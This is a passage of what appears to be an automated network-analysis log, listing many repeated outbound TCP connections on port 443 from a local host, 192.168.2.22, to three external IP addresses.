                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
